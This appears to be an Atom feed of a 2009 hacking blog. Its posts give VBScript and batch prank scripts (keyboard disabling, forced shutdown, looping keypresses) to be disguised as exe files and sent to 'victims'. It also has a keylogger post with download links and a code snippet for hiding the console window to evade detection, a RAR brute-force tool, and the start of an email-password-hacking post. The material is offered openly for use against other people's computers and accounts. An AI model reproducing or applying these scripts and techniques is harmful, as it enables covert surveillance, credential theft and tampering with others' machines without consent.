<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-7814885976389384260</id><updated>2012-01-29T10:18:58.910+05:30</updated><category term='Coding'/><category term='tricks'/><category term='Hack Metacafe'/><category term='Hiding Tools'/><category term='Hack tools'/><category term='RATs'/><category term='Crypter'/><category term='Serial and Crack'/><category term='Protection'/><category term='Trojans'/><category term='Windows'/><category term='Password Cracking'/><category term='Fake pages'/><category term='Hack Youtube'/><category term='Anti Keylogger'/><category term='Remote Hacking'/><category term='Download video'/><category term='IP Finder'/><category term='Mobile Hack'/><category term='phishing'/><category term='Ways to hack'/><category term='keylogger'/><category term='Hacking Passwords'/><category term='Scripts'/><category term='batch file hacking'/><category term='Source Codes'/><category term='binders'/><category term='Hacking'/><category term='Lost Password'/><category term='Email Hacking'/><category term='Social Enginnering'/><title type='text'>hack gmail Password At "Hacker Hubz!!!"</title><subtitle type='html'>Hack Gmail Password, We will teach you hacking from the very beginning, providing you detailed tutorials and tools you will need to get started, You don't need to be an expert to start here.. all you need is zeal to learn.. and we will do the rest by providing you all you need.. Everything About Hacking.. From Cell Phones to Emails.. Hacking Individual Ids to mass Hacking.. Just use the techniques explained in the blog.. Please Bookmark The Page For Future Reference..!!</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>27</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-6536802971307972260</id><published>2009-11-10T19:50:00.005+05:30</published><updated>2009-11-10T19:59:52.669+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='Scripts'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>Little fun with scripts..</title><content type='html'>Like my previous post this won't be the core hacking guide but a window trick, since most readers here need something to pass to there friends and have fun.. so here it comes..&lt;br /&gt;
&lt;br /&gt;
Here i will give you few codes for VB Scripts which you can copy to notepad and then save as ".vbs" and can execute directly or can convert it to exe too.. will give the link to the tool for converting at last..&lt;br /&gt;
&lt;br /&gt;
so here are the things you can do..&lt;br /&gt;
&lt;br /&gt;
1. Play with the Lights..!!!&lt;br /&gt;
turn on and off the caps lock of the system.. this will annoy the victim..&lt;br /&gt;
&lt;i&gt;Set wshShell =wscript.CreateObject("WScript.Shell")&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;do&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;wscript.sleep 100&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;wshshell.sendkeys "{CAPSLOCK}"&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;loop&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
2. This wasn't good enough..?? now, what if the Enter is pressed continuously..?? then use tis code..&lt;br /&gt;
&lt;i&gt;Set wshShell = wscript.CreateObject("WScript.Shell")&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;do&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;wscript.sleep 100&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;wshshell.sendkeys "~(enter)"&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;loop&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;3. Had enough with the keys..?? how about if the cd drive keeps poping out.. again and again.. ??&lt;br /&gt;
&lt;i&gt;Set oWMP = CreateObject("WMPlayer.OCX.7")&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Set colCDROMs = oWMP.cdromCollection&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;do&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;if colCDROMs.Count &amp;gt;= 1 then&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;For i = 0 to colCDROMs.Count - 1&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;colCDROMs.Item(i).Eject&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Next&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;For i = 0 to colCDROMs.Count - 1&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;colCDROMs.Item(i).Eject&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Next&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;End If&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;wscript.sleep 100&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;loop&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
There are many other tricks you can Google them.. my main objective is to inform you and provide you with a tool to convert it to a more suitable format to use i.e. ".exe"&lt;br /&gt;
&lt;br /&gt;
so here is the tool..&lt;br /&gt;
&lt;a href="http://www.ziddu.com/download/7306220/exescript.rar.html"&gt;Download VBS to EXE Converter..&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
this is demo for 15 days but your job will be done by then.. or try finding the key for it.. Do comment..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-6536802971307972260?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/6536802971307972260/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/11/little-fun-with-scripting-files.html#comment-form' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/6536802971307972260'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/6536802971307972260'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/11/little-fun-with-scripting-files.html' title='Little fun with scripts..'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-6895685672478102078</id><published>2009-11-10T19:00:00.000+05:30</published><updated>2009-11-10T19:00:44.405+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='batch file hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Scripts'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>Hack using Batch Files..</title><content type='html'>So, its long time since my last post.. So to start up again, we won't jump into core stuffs, lets have some fun and learn about things which you can do using your command prompt.. You can access all the&amp;nbsp;functionalities you know about your system and even a lot more using the command prompt..&lt;br /&gt;
&lt;br /&gt;
But the question is, suppose you know what to do in command prompt and annoy someone, but how would you do this in victim's system or someone, you wanna play prank..?? So, the answer is BATCH Files, the are the series of commands which you write in a notepad and save with a ".bat" extension. those commands are the one you write in the cmd of windows.. don't panic.. i will give some commands too at the end of the post.. Now don't you think it will be lot&amp;nbsp;convenient if we could convert it to an ".exe" file..?? huh..?? so fine, i will give link to the software for that purpose too..&lt;br /&gt;
&lt;br /&gt;
So all you have to do is to make a batch file and then just convert it to exe and send it to the victim.. and ya have fun then..&lt;br /&gt;
&lt;br /&gt;
So lets start listing some cool stuffs you can do with batch files..&lt;br /&gt;
&lt;br /&gt;
1. so start with the basics.. lets try&amp;nbsp;shutting down the windows.. what say..???&lt;br /&gt;
so here is what you have to write in notepad and save with .bat extension, then convert it to exe&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;Shutdown -s -t 60 -c "So Sorry.. Bye.."&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
now you can change "-s" to "-l" for log off or to "-r" for restart.. the number after "-t" is the seconds before the &amp;nbsp;execution of the task&lt;br /&gt;
&lt;br /&gt;
2. so, that wasn't fun..?? huh..?? how about&amp;nbsp;swapping&amp;nbsp;the mouse buttons..?? here it is..&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif; font-size: 15px; font-style: italic; font-weight: bold;"&gt;@echo off&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-size: 15px;"&gt;&lt;b&gt;&lt;i&gt;&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;Rundll32 user32,SwapMouseButton&lt;br /&gt;
rundll32 keyboard,disable&lt;br /&gt;
msg * Enjoy Buddy.. You are Screwed..&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;"&gt;now this will change his right mouse to left and vice versa..&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;There are many more tricks available with batch files but thats not our main objective.. you can&amp;nbsp;Google&amp;nbsp;it.. make your batch file and then convert it to exe using the converter below..&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;a href="http://www.ziddu.com/download/7305709/Bat_To_ExeHackerhubz.blogspot.com.rar.html"&gt;Download Batch to Exe Converter&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Times, 'Times New Roman', serif;"&gt;if you have face any problems regarding creation of files or using the software, do comment..&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-6895685672478102078?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/6895685672478102078/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/11/hack-using-batch-files.html#comment-form' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/6895685672478102078'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/6895685672478102078'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/11/hack-using-batch-files.html' title='Hack using Batch Files..'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-2169356319668303501</id><published>2009-10-22T22:15:00.001+05:30</published><updated>2009-10-22T23:28:05.095+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='Hack Youtube'/><category scheme='http://www.blogger.com/atom/ns#' term='Hack Metacafe'/><category scheme='http://www.blogger.com/atom/ns#' term='Download video'/><title type='text'>Download any video from youtube, Metacafe, blogs or any site you know..</title><content type='html'>Ya, Everyone enjoy finding their favorite videos over online video sharing site like Youtube, Metacafe, Myspace, etc,etc.. We surf over thousands of videos and we do download few of them using the sites like Keepvid, Clipnabber or some free tools for the purpose, which uses the url of the video...&lt;br /&gt;
&lt;br /&gt;
Now, What if:&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;-Embedding is disabled by the author of the video in Youtube..??&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;-You are unable to find the real url of the video from some site..??&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;-URL is masked by the carring site..??&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;-Video is in blog, or any minor site not supported by our downloading tool or site..??&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
So, you end up not able to download the video you liked..?? You think there is no way now to get that video..?? so, sorry to break your belief, so now i will tell you how to get any video, without any effort or using any site or tool.. Ready now...??&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Follow the steps:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
1. Launch your browser, find the video you need, let it get buffered fully, enjoy it till then, then just close the browser.. Your half job is done... now some easy steps..&lt;br /&gt;
2. No, you don't need any tool or software, the video is in your own harddrive you just have to find the right place to look at.. find it and rename it..&lt;br /&gt;
3. For that to happen, visit your browser's cache location..(change the username)&lt;br /&gt;
Chrome:&lt;br /&gt;
&lt;i&gt;C:\Documents and Settings\&amp;lt;User Name&amp;gt;\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache&lt;/i&gt;&lt;br /&gt;
Opera:&lt;br /&gt;
&lt;i&gt;C:\Documents and Settings\&amp;lt;User Name&amp;gt;\Local Settings\Application Data\Opera\Opera\cache&lt;/i&gt;&lt;br /&gt;
Firefox:&lt;br /&gt;
&lt;i&gt;C:\Documents and Settings\&amp;lt;User Name&amp;gt;\Local Settings\Application Data\Mozilla\Firefox\Profiles\&amp;lt;Profile Name&amp;gt;\Cache&lt;/i&gt;&lt;br /&gt;
IE:&lt;br /&gt;
&lt;i&gt;C:\Documents and Settings\sham\Local Settings\Temporary Internet Files&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
4. Now right click and arrange icon by size or modifing date.. you will find the large size file, rename it to any name and give .flv extension.&lt;br /&gt;
5. Now, play the file in VLC or any other player supporting flv..&lt;br /&gt;
&lt;br /&gt;
So, Now, don't surf around searching for video downloading sites or tools, and enjoy any video you like, download it without any effort..&lt;br /&gt;
&lt;br /&gt;
hope you liked the post.. Do Comment&lt;br /&gt;
&lt;a href="http://hackerhubz.blogspot.com/2009/10/all-types-of-hacking-techniques.html"&gt;Hack Gmail&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-2169356319668303501?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/2169356319668303501/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/download-any-video-from-youtube.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/2169356319668303501'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/2169356319668303501'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/download-any-video-from-youtube.html' title='Download any video from youtube, Metacafe, blogs or any site you know..'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-9031159569097030361</id><published>2009-10-15T21:50:00.006+05:30</published><updated>2009-10-22T23:28:24.440+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Source Codes'/><category scheme='http://www.blogger.com/atom/ns#' term='keylogger'/><category scheme='http://www.blogger.com/atom/ns#' term='Coding'/><title type='text'>Coding Your own Keylogger..</title><content type='html'>So till now, we only concentrated on hacking using tricks, social&amp;nbsp;engineering, existing tools and other things.. So, now its time we start learning how to create our own, because by the time we start using this tools, they are already released in public and hence is identified by most of the anti-virus software, making your job harder.. So if you create one for yourself and not intend to release it in public.. You can use it without&amp;nbsp;worrying&amp;nbsp;about anti-virus software installed at victim's side..&lt;br /&gt;
&lt;br /&gt;
To start with we will create a basic key-logger.. You already know by now, it is a basic component for a trojan, RATs, and almost every hacking software uses this feature.. Its available in many&amp;nbsp;flavors or we can call it enhancement.. like invisible to user, invisible in task bar, stealth mode, autostart, mailing function, etc, etc.. today we will learn only the basic that is how it records the keystrokes..??&lt;br /&gt;
A keylogger listens to every keystrokes and records it for us.. There exists three way to implement keyloggers(that i know about..). They are:&lt;br /&gt;
1.&amp;nbsp;GetAsyncKeyState&lt;br /&gt;
2.&amp;nbsp;GetKeyboardState&lt;br /&gt;
&lt;div&gt;3.Windows Hooks&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Here we will be using the AsynckeyState one.. Now i love the language C++, so i will be using that, but it can be implemented in any language, i will be posting the VB6 and DOT NET versions soon..&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;So, lets get started..&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;I am posting the code, it is self explanatory, if you face any problem or need any help, related to compiling or understanding.. Comment here..&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;and ya, your keys are logged at "logs.txt" in the same folder as your exe..&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;i&gt;CODE:&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;span style="font-style: normal; font-weight: normal;"&gt;/* THIS CODE WAS Published By Pratik Mishra.. Using help from the net and other programmers..&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;i&gt;&lt;div&gt;&lt;span style="font-style: normal; font-weight: normal;"&gt;If you find any problem comment at http://www.hackerhubz.blogspot.com&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-style: normal; font-weight: normal;"&gt;*/&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-style: normal; font-weight: normal;"&gt;&lt;a href="http://www.ziddu.com/download/7025701/keylogger_Source.txt.html"&gt;Download Source Code(.CPP)&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-style: normal; font-weight: normal;"&gt;&lt;a href="http://www.ziddu.com/download/7025680/keylogger_hackerhubz.blogspot.com.exe.html"&gt;Download EXE File..&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;span style="font-weight: normal;"&gt;I hope you enjoyed the post.. Do Comment..&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-weight: normal;"&gt;and if you wanna make your program invisible then you can add this to code.. at the start of main() Function..&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-style: normal; font-weight: normal;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-style: normal; font-weight: normal;"&gt;&amp;nbsp;typedef HWND (WINAPI *tGetConsoleWindow)(void);&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-style: normal; font-weight: normal;"&gt;&lt;span style="font-style: italic; font-weight: bold;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-style: normal; font-weight: normal;"&gt;&lt;span style="font-style: italic; font-weight: bold;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-style: normal; font-weight: normal;"&gt;&lt;span style="font-style: italic; font-weight: bold;"&gt;&lt;div&gt;&lt;span style="font-style: normal; font-weight: normal;"&gt;&amp;nbsp;&amp;nbsp;tGetConsoleWindow pGetConsoleWindow = 0;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-style: normal; font-weight: normal;"&gt;&amp;nbsp;&amp;nbsp;HINSTANCE handle = &amp;nbsp;::LoadLibrary("Kernel32.dll");&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-style: normal; font-weight: normal;"&gt;&amp;nbsp;&amp;nbsp;if ( handle )&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-style: normal; font-weight: normal;"&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;pGetConsoleWindow = (tGetConsoleWindow)::GetProcAddress(handle, "GetConsoleWindow"); &amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-style: normal; font-weight: normal;"&gt;&amp;nbsp;&amp;nbsp;if ( pGetConsoleWindow )&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-style: normal; font-weight: normal;"&gt;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-style: normal; font-weight: normal;"&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;HWND hwnd = pGetConsoleWindow();&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-style: normal; font-weight: normal;"&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;::ShowWindow(hwnd,SW_HIDE);&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-style: normal; font-weight: normal;"&gt;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-style: normal; font-weight: normal;"&gt;&amp;nbsp;&amp;nbsp;if ( handle )&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-style: normal; font-weight: normal;"&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;::FreeLibrary(handle);&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-style: normal; font-weight: normal;"&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;span style="font-style: normal; font-weight: normal;"&gt;So, now we getting into real&amp;nbsp;business&amp;nbsp;but the new kiddies don't worry will keep on posting some cool stuffs, tricks and tools for you too...&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-style: normal; font-weight: normal;"&gt;&lt;a href="http://hackerhubz.blogspot.com/2009/10/all-types-of-hacking-techniques.html"&gt;Hack Gmail&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/i&gt;&lt;/b&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-9031159569097030361?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/9031159569097030361/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/coding-your-own-keylogger.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/9031159569097030361'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/9031159569097030361'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/coding-your-own-keylogger.html' title='Coding Your own Keylogger..'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-8777832117490136376</id><published>2009-10-14T20:57:00.001+05:30</published><updated>2009-10-22T23:28:44.785+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Lost Password'/><category scheme='http://www.blogger.com/atom/ns#' term='Password Cracking'/><title type='text'>Forgot Your Rar file Password???</title><content type='html'>&lt;span style="font-family: Arial; font-size: small;"&gt;&lt;span style="font-size: 13px;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial; font-size: small;"&gt;&lt;span style="font-size: 13px;"&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Winrar is the most commonly used software today.. whether to reduce the size or to protect your sensitive data.. But there are times when you lose your rar file password..&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Almost everyone of us find such password protected winrar file.For example, you have downloaded movies or something else from torrent or rapidshare, and when you try to open the downloaded file appears “Enter password for the encrypted file”… Damn… what next…You can decrypt the password of the .rar file with RAR Password Cracker. It works great with small password but time increase exponentially as length increase.. and to be honest this is the only way to crack rar password.. Bruteforcing Coz it is encrypted with industry strength AES (Advanced Encryption Standard) Encryption with a key of 128 bits and there is no way through it..&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;So we better get going coz it worth a shot if the file is really important before you give up..&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;You can use a dictionary attack and a brute force attack.if you have a good&amp;nbsp;dictionary&amp;nbsp;then go with it it reduces the time and if you know the person well you can define your own dictionary to use. else go for Bruteforce. Brute force actually means to start with a letter a and encrypting it. Then see if the encrypted strings match. If not then b, c, … until we’ve gotten . Then the encrypted strings will match and we’ll know that is the right password. Brute force attack is the slowest method of cracking, but there is no risk that you’ll not find the password. The thing about brute force is that the time of cracking rises rapidly depending on how long the password is, how many characters are being used in it and so forth.&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;try the software and if you run into any problem comment here..&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.ziddu.com/download/6914083/rpc412Hackerhubz.rar.html"&gt;Download Here..&lt;/a&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: 'Times New Roman'; font-size: medium;"&gt;&lt;a href="http://hackerhubz.blogspot.com/2009/10/all-types-of-hacking-techniques.html"&gt;Hack Gmail&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-8777832117490136376?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/8777832117490136376/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/forgot-your-rar-file-password.html#comment-form' title='9 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/8777832117490136376'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/8777832117490136376'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/forgot-your-rar-file-password.html' title='Forgot Your Rar file Password???'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7814885976389384260.post-3728573244868658985</id><published>2009-10-10T18:50:00.001+05:30</published><updated>2009-10-22T23:29:02.601+05:30</updated><category scheme='http://www.blogger.com/atom/ns#' term='Email Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Social Enginnering'/><title type='text'>Hack Any Password in a minutes..??</title><content type='html'>&lt;span style="font-family: Arial; font-size: small;"&gt;&lt;span style="font-size: 13px;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial; font-size: small;"&gt;&lt;span style="font-size: 13px;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: Arial; font-size: small;"&gt;&lt;span style="font-size: 13px;"&gt;&lt;div&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div&gt;Most of the people always ask for the easiest way of hacking email password. It is the most widely googled phrase for a long time. In fact the most widely asked question on hacking is related to email password hacking.The thing is you all also have same thing in your minds.. so, thats why you are here.. So, I already told you enough tricks, but my aim here is not only to tell you how to hack the accounts but also to help you protect your own accounts..&lt;br /&gt;
